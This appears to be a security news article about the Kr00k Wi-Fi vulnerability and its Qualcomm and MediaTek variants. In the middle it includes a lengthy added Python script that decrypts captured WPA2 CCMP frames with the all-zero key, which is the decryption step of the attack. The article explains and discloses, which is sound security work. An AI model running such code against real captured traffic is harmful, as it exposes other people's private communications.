In early 2020, ESET researchers described the Kr00k vulnerability (CVE-2019-15126), which can be used to intercept and decrypt Wi-Fi (WPA2) traffic. It was reported at the time that devices built on Wi-Fi chips from Cypress Semiconductor and Broadcom, from laptops and smartphones to routers and IoT devices, were susceptible to the problem.
The researchers wrote that they had tested and confirmed the problem on the iPhone, iPad and Mac, the Amazon Echo and Kindle, the Google Nexus, Samsung Galaxy, Xiaomi Redmi and Raspberry Pi 3, and on Wi-Fi routers from Asus and Huawei. In total, Kr00k was thought to threaten about a billion devices.
The crux of Kr00k is the encryption that protects data frames transmitted over Wi-Fi. Normally such frames are encrypted with a per-session key derived from the Wi-Fi password set by the user. In vulnerable chips, however, this key is reset to all zeros when disassociation occurs, that is, when the device is temporarily detached from the access point, which normally happens on its own because of a weak signal.
An attacker can therefore repeatedly force a device into disassociation (disassociation frames are unauthenticated in WPA2 unless protected management frames are in use, so they can be forged) and capture the data frames the vulnerable chip still sends out in that state. Because those frames were encrypted with the all-zero key, exploiting Kr00k lets the attacker decrypt them.
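To make the mechanism concrete, here is an added example in Python (written for this page; it is not ESET's code or their published test script). It takes a CCMP-protected 802.11 data frame and tries to decrypt it with the all-zero temporal key: if the frame's integrity check (MIC) passes under that key, the frame was transmitted by a chip in the Kr00k state and is readable by anyone who captured it. AES-128 and AES-CCM are implemented inline so the script runs offline with no third-party packages; the MAC addresses, session key and frames are constructed for the demonstration, and the frame parser assumes plain (non-QoS, three-address) data frames.

```python
"""Added example (not ESET's code): check whether a captured CCMP data frame was encrypted with the
all-zero temporal key a Kr00k-affected chip holds after disassociation. AES-128 and AES-CCM are
implemented from the spec so this runs offline; the frames below are constructed, not captured."""
import struct

# ---- AES-128, encrypt direction only (CCM never needs the inverse cipher) ----
def _xtime(a):                      # multiply by x in GF(2^8) modulo the AES polynomial
    a <<= 1
    return a ^ 0x11B if a & 0x100 else a
def _make_sbox():                   # S-box = affine transform of the GF(2^8) inverse
    exp, g = [], 1
    for _ in range(255):            # g runs through 3^i; 3 generates GF(2^8)*
        exp.append(g)
        g ^= _xtime(g)              # g *= 3
    sbox = [0x63]                   # 0 has no inverse and maps to 0x63
    for x in range(1, 256):
        inv = s = exp[-exp.index(x) % 255]
        for _ in range(4):          # s = inv ^ rotl(inv,1) ^ ... ^ rotl(inv,4)
            inv = ((inv << 1) | (inv >> 7)) & 0xFF
            s ^= inv
        sbox.append(s ^ 0x63)
    return sbox
SBOX = _make_sbox()
def _expand_key(key):               # AES-128 key schedule -> 11 round keys of 16 bytes
    w, rcon = [list(key[i:i + 4]) for i in range(0, 16, 4)], 1
    for i in range(4, 44):
        t = list(w[i - 1])
        if i % 4 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]                  # RotWord + SubWord
            t[0] ^= rcon
            rcon = _xtime(rcon)
        w.append([a ^ b for a, b in zip(w[i - 4], t)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(11)]
def _aes_encrypt_block(rk, block):  # state kept column-major, i.e. in byte order
    s = [b ^ k for b, k in zip(block, rk[0])]
    for rnd in range(1, 11):
        s = [SBOX[b] for b in s]                                  # SubBytes
        s = [s[(i + 4 * (i % 4)) % 16] for i in range(16)]        # ShiftRows
        if rnd != 10:                                             # MixColumns, column by column
            s = [s[c + j] ^ s[c] ^ s[c + 1] ^ s[c + 2] ^ s[c + 3] ^ _xtime(s[c + j] ^ s[c + (j + 1) % 4])
                 for c in range(0, 16, 4) for j in range(4)]
        s = [b ^ k for b, k in zip(s, rk[rnd])]                   # AddRoundKey
    return bytes(s)

# ---- AES-CCM with CCMP parameters: 13-byte nonce, 8-byte MIC, 2-byte length (RFC 3610) ----
MIC_LEN = 8
def _ccm_mac(rk, nonce, aad, msg):  # CBC-MAC over B0 || AAD blocks || message blocks
    flags = 0x40 | ((MIC_LEN - 2) // 2) << 3 | 1                  # Adata, M'=3, L'=1 -> 0x59
    a = struct.pack(">H", len(aad)) + aad                         # assumes len(aad) < 0xFF00
    blocks = (bytes([flags]) + nonce + struct.pack(">H", len(msg))
              + a + bytes(-len(a) % 16) + msg + bytes(-len(msg) % 16))
    x = bytes(16)
    for i in range(0, len(blocks), 16):
        x = _aes_encrypt_block(rk, bytes(p ^ q for p, q in zip(x, blocks[i:i + 16])))
    return x[:MIC_LEN]
def _ctr(rk, nonce, data, first=1): # CTR mode; counter block A_i = 0x01 || nonce || i
    out = bytearray()
    for i in range(0, len(data), 16):
        ks = _aes_encrypt_block(rk, bytes([1]) + nonce + struct.pack(">H", first + i // 16))
        out += bytes(p ^ k for p, k in zip(data[i:i + 16], ks))
    return bytes(out)
def ccm_encrypt(tk, nonce, aad, plaintext):
    rk = _expand_key(tk)
    return _ctr(rk, nonce, plaintext) + _ctr(rk, nonce, _ccm_mac(rk, nonce, aad, plaintext), 0)
def ccm_decrypt(tk, nonce, aad, body):   # plaintext if the MIC verifies under tk, else None
    rk = _expand_key(tk)
    pt = _ctr(rk, nonce, body[:-MIC_LEN])
    return pt if _ctr(rk, nonce, body[-MIC_LEN:], 0) == _ccm_mac(rk, nonce, aad, pt) else None

# ---- 802.11 CCMP framing (assumption: non-QoS, 3-address data frames, no A4/HT Control) ----
ZERO_TK = bytes(16)                 # the key a Kr00k-affected chip holds after disassociation
def ccmp_nonce_and_aad(frame):      # -> (nonce, aad, encrypted body + MIC), per IEEE 802.11
    fc, a1, a2, a3, sc = frame[0:2], frame[4:10], frame[10:16], frame[16:22], frame[22:24]
    pn0, pn1, _, keyid, pn2, pn3, pn4, pn5 = frame[24:32]       # CCMP header (ExtIV assumed set)
    nonce = bytes([0]) + a2 + bytes([pn5, pn4, pn3, pn2, pn1, pn0])   # priority || A2 || PN
    fc_masked = bytes([fc[0] & 0x8F, fc[1] & 0x07 | 0x40])       # subtype, Retry, PwrMgt, MoreData, Order cleared; Protected set
    aad = fc_masked + a1 + a2 + a3 + bytes([sc[0] & 0x0F, 0])    # sequence number masked, fragment kept
    return nonce, aad, frame[32:]
def build_frame(tk, a1, a2, a3, pn, payload):   # protected non-QoS data frame, ToDS=1, seq 1
    hdr = bytes([0x08, 0x41, 0, 0]) + a1 + a2 + a3 + bytes([0x10, 0])
    hdr += bytes([pn[5], pn[4], 0, 0x20, pn[3], pn[2], pn[1], pn[0]])   # 6-byte big-endian PN
    nonce, aad, _ = ccmp_nonce_and_aad(hdr)
    return hdr + ccm_encrypt(tk, nonce, aad, payload)
def try_zero_tk(frame):
    """Kr00k check: plaintext if the MIC verifies under TK = 0x00*16 (readable by any sniffer), else None."""
    nonce, aad, body = ccmp_nonce_and_aad(frame)
    return ccm_decrypt(ZERO_TK, nonce, aad, body)

# Constructed sample (not from the report): a client's queued frame flushed after disassociation.
AP, CLIENT, DST = bytes.fromhex("02000000aa01"), bytes.fromhex("02000000bb02"), bytes.fromhex("02000000cc03")
PN = bytes.fromhex("000000000007")
PAYLOAD = bytes.fromhex("aaaa030000000800") + b"placeholder application bytes"   # LLC/SNAP + data
REAL_TK = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0")                     # a normal session key
KROOK_FRAME = build_frame(ZERO_TK, AP, CLIENT, DST, PN, PAYLOAD)   # sent with the zeroed key
SAFE_FRAME = build_frame(REAL_TK, AP, CLIENT, DST, PN, PAYLOAD)    # sent with the session key

if __name__ == "__main__":
    print("zero-TK frame:", try_zero_tk(KROOK_FRAME))   # the plaintext comes back
    print("keyed frame  :", try_zero_tk(SAFE_FRAME))    # None
```

Against real traffic, feed the 802.11 header plus CCMP body of each data frame captured in monitor mode to `try_zero_tk`; a non-None result means that frame left the chip encrypted with the zeroed key. The check is passive: it does not trigger the disassociation, it only inspects the frames sent after one, and the MIC verification is what makes it reliable, since a random key would decrypt to garbage but not produce a matching MIC.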
Following ESET's February report, Broadcom and Cypress released fixes for their products.
Now, however, ESET researchers have warned that chips from Qualcomm and MediaTek are vulnerable to similar flaws.
In the case of Qualcomm, the vulnerability received the identifier CVE-2020-3702; by exploiting it, an attacker can obtain sensitive data after a disassociation. The difference from the attack described above is that the data captured in this case is not encrypted at all, whereas exploiting the original Kr00k bug at least required decrypting the traffic with the "zero" key.
The researchers demonstrated the vulnerability on the D-Link DCH-G020 Smart Home Hub and the Turris Omnia wireless router, but any other device with an affected Qualcomm chip is also at risk.
Qualcomm released a patch for its proprietary driver in July 2020, but the situation is complicated by the fact that some vulnerable devices use open-source Linux drivers, and it is unclear whether the problem will be fixed there as well. Qualcomm said it has already provided OEMs with the necessary guidance, so users can only wait for patches from the individual manufacturers.
In addition, ESET researchers found that MediaTek chips, which are widely used in Asus routers as well as in the Microsoft Azure Sphere development kit, likewise transmit data without any encryption. "Azure Sphere uses the MediaTek MT3620 microcontroller and targets a wide variety of IoT applications, including smart homes, commercial, industrial and many other sectors," the researchers write.
MediaTek released fixes for this issue in March and April, and Azure Sphere received patches in July 2020.
Since a number of exploits for the original Kr00k vulnerability have already been published, the researchers have released a script that helps to determine whether a given device is vulnerable to the original Kr00k or to the new variants of the attack.